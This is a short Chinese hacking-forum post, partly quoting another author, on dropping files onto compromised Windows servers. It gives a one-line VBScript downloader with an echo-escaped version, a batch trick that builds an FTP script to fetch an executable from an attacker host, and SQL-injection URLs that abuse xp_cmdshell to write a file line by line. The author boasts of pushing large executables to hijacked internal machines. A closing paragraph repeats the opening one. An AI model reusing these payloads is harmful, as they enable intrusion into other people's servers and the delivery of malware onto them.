來源:情感網絡 作者:xiaolu
我是在黑哥Blog看到的他寫的,先引用黑哥的:
原理很清楚了,我寫的sqlcomm.exe就是用的這個原理使命令只運行一次的,這個經過我嚴格的測試,我曾經echo過100多K的文件(exe2bat生成的文件)到內網肉雞,成功使用Debug的還原成exe,建議配合我寫的exe2vbs,呵呵,每行512個字符,努力做到最少行,最近廢話多多,就此打住。
我是在黑哥Blog看到的他寫的,先引用黑哥的:
Quote:
文/superhei
解決辦法:
1.iget.vbs一次寫入
在vbs語句的接觸是符號是: 所以我們iget.vbs可以這樣寫Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
這樣我們可以一次echo成功,echo版本:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs
2.bat調用ftp腳本的寫法(by envymask)echo ftp>1.vbs
echo open ip>2.vbs
echo u>3.vbs
echo s>4.vbs
echo binary>5.vbs
echo get 1.exe>6.vbs
echo bay>7.vbscopy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
說說我的解決辦法:
| http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell 'echo xxxx1 > xxx.vbs';exec master..sp_dropextendedproc 'xp_cmdshell'-- http://xxx.com/x.asp?id=1;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')-- http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell 'echo xxxx2 >> xxx.vbs';exec master..sp_dropextendedproc 'xp_cmdshell'-- http://xxx.com/x.asp?id=1;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')-- . . . |
原理很清楚了,我寫的sqlcomm.exe就是用的這個原理使命令只運行一次的,這個經過我嚴格的測試,我曾經echo過100多K的文件(exe2bat生成的文件)到內網肉雞,成功使用Debug的還原成exe,建議配合我寫的exe2vbs,呵呵,每行512個字符,努力做到最少行,最近廢話多多,就此打住。
